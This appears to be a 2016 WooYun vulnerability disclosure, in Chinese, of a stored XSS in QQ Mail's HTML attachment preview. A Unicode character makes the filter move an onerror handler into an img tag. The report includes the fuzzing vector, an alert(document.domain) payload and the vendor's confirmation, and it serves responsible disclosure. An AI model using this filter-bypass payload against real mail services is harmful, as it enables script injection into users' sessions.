当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0169137

漏洞标题:腾讯邮箱存储型XSS漏洞2(浏览器通用)

相关厂商:腾讯

漏洞作者: mramydnei

提交时间:2016-01-11 16:33

修复时间:2016-02-22 16:48

公开时间:2016-02-22 16:48

漏洞类型:XSS 跨站脚本攻击

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-01-11: 细节已通知厂商并且等待厂商处理中
2016-01-12: 厂商已经确认,细节仅向厂商公开
2016-01-22: 细节向核心白帽子及相关领域专家公开
2016-02-01: 细节向普通白帽子公开
2016-02-11: 细节向实习白帽子公开
2016-02-22: 细节向公众公开

简要描述:

还是fuzz,不过这次是<img src=x onerror=alert(1)>

详细说明:

使用QQ邮箱对部分附件(htm,html等)进行预览时,部分特殊unicode字符可导致防御xss的机制被绕过。
一般情况下,QQ邮箱不会过滤

1.未知attribute及其value
2.如果event handler(onxxx)出现在tag之外也是不会去管


基于上面的理论,我们可以构造下面的测试vector:

<img src="http://dm3.in/test.png" x="[U+000000,U+10FFFF]"> onerror=alert(1) <br>


每2万个vector一组(存储到同一个htm文件),也就只有30多个htm文件。实际测试当中,测试到第二个文件的时候防御机制就被pwn掉了。
原始内容:

%E4%B9%80 <img src="http://dm3/in/test.png" x="乀"> onerror=alert(document.domain) <br>


预览时的内容:

%E4%B9%80 <img src="http://dm3/in/test.png" x="涔€" onerror="alert(document.domain)" <br="">

漏洞证明:

将下面的文件添加到附加中,发送给自己。然后对附件进行预览即可。

http://dm3.in/tools/infuzz/result.htm


相关截图:

屏幕快照 2016-01-11 下午5.21.40.png


ps:会导致上述情况发生的不单是U+4E40

修复方案:

不看代码还真不好说

版权声明:转载请注明来源 mramydnei@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2016-01-12 16:11

厂商回复:

非常感谢您的报告,问题已着手处理,感谢大家对腾讯业务安全的关注。如果您有任何疑问,欢迎反馈,我们会有专人跟进处理。

最新状态:

暂无